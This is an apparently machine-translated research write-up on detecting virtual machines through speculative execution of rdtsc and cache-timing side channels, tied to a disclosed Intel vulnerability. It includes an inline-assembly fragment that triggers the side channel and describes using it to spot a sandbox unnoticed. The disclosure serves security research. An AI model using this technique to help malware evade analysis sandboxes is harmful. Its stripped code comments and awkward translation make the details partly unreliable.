New attack technique based on Meltdown. Using speculative instructions for detecting virtualization

The Meltdown attack has opened a new class of processor attacks that uses architectural states to transfer information. But the speculative execution, which was first used to attack in Meltdown, allows not only to execute the code with the removal of restrictions, but also to find out certain details of the processor. We found a new way to implement an attack using architectural states. It allows you to detect virtualization, based on how the processor chooses to send instructions for speculative execution or not. We reported this method to Intel, and on May 21, 2018, the vulnerability alert "Q2 2018 Speculative Execution Side Channel Update" was released , in which our vulnerability CVE-2018-3640 or Specter Variant 3a is present.

1. Introduction

The attack is based on a side channel in a cache similar to the Meltdown attack. Meltdown is known to use speculative execution to access memory, which should not be available without special privileges. The attack in question differs from Meltdown in that it does not use the cache access time threshold. This is possible due to the fact that the processor executes certain instructions in advance to speed up the execution of the code. Meltdown recycles reading from buffers controlled by buffers during speculative execution in such a way that the offender can use the memory access time measurements as a side channel.

2. Virtualization

The VT-x technology in Intel processors allows the hypervisor to choose whether VMEXIT (context switch to hypervisor) will occur when executing certain instructions, for example rdtsc. Most virtualization environments in the standard configuration configure rdtsc interception by default. So do, for example Virtualbox, VMware, Hyper-V, Parallels on the hypervisor from Apple and from Parallels. Because VMEXIT actually means a context switch, the instructions that generate VMEXIT are longer to execute than if they were executed in a non-virtualized environment.

3. Attack

A buffer of several pages is created. Then, instead of speculative access to memory areas in order to obtain data, rdtsc instruction is executed speculatively and the result of its execution is used to access a certain part of the previously allocated buffer. In the case of speculative execution, only a certain part of the allocated buffer is accessed, which makes it possible to distinguish cases of speculative access from random errors. After completing the execution of the function containing the speculative execution of the code, the page number of the memory with the lowest access time is added to the statistics. Then the cache is reset in the entire buffer. The following are the functions that are used to trigger speculative execution and memory access in 32-bit versions of Windows:
')

_declspec(naked) void herring() { //    __asm { //  xorps xmm0, xmm0 //   speculate sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 sqrtpd xmm0, xmm0 movd eax, xmm0 lea esp, [esp+eax+4] ret } } _declspec(naked) void __fastcall speculate(const char* detector) { __asm { //    rdtsc  mfence. //  ,  mov esi, ecx. // rdtsc  call herring rdtsc. //  and eax, 7. //  or eax, 32. //* shl eax, 12. //* movzx eax, byte ptr [esi+eax] //* } }

To successfully launch an attack, these actions must be repeated to find the distribution of cached pages. You need to perform as many repetitions as you need to collect enough statistical data: during the described test, 10,000 iterations were used. Then the number of misses by the selected memory region is calculated. In virtualized environments where rdtsc interception is enabled, the percentage of such misses is between 50 and 99 percent. On non-virtualized systems, it is less than one percent. This information is presented in the figure below (the darker the memory region, the more hits recorded in it). When testing, macOS, Ubuntu, Debian and Windows were used as non-virtualized systems, and Ubuntu, Debian and Windows were used as guest systems.

Distribution of cached pages in different environments

4. Description of the attack

The attack uses speculative execution of instructions to force the processor to reveal information about the performance of rdtsc. In a non-virtualized environment, rdtsc is executed on the processor itself, which simply returns a counter. In a virtualized environment where the RDTSC exiting bit is set to MSR IA32_VMX_PINBASED_CTLS, the execution of rdtsc is essentially a context switch that takes too long.

At the time of the discovery of vulnerabilities, the available internal documentation of Intel processors did not contain data that would allow to explain exactly what is happening. We have two assumptions: either the processor decides that rdtsc will be executed for too long, and does not execute it until the execution flow reaches it directly, or all instructions that cause VMEXIT are not executed speculatively. In a non-virtualized environment, the rdtsc instructions immediately following it are executed speculatively, but this does not happen in a virtualized environment.

5. Conclusions and directions for future research

The described attack uses a new Meltdown-based caching technique to create a side channel, which, instead of accessing privileged memory regions, reveals information about the processor's mode of operation. All known methods for detecting virtualization are highly dependent on using the rdtsc instruction as a timer, which allows the smart hypervisor to deceive these methods by replacing the returned values. Such an attack can also be limited, but if you make small changes to the code, the substitution of time by the hypervisor will not be able to affect the result. Perhaps we will publish a PoC of this version later.
It can be concluded that in virtualized environments with intercepted rdtsc, the variation of the described attack allows detecting the presence of virtualization, and in the absence of interception, it is possible to use previously known methods, for example, the method of measuring the speeds of working with TLB caches.

This attack allows you to easily and quickly detect virtualization in environments with standard settings or in environments that intentionally use rdtsc interception in order to protect themselves from the detection of virtualization. This attack was successfully tested on a virtualized sandbox: experts found a sandbox without posing themselves.

PoC code can be found at the link

Source: https://habr.com/ru/post/359110/

All Articles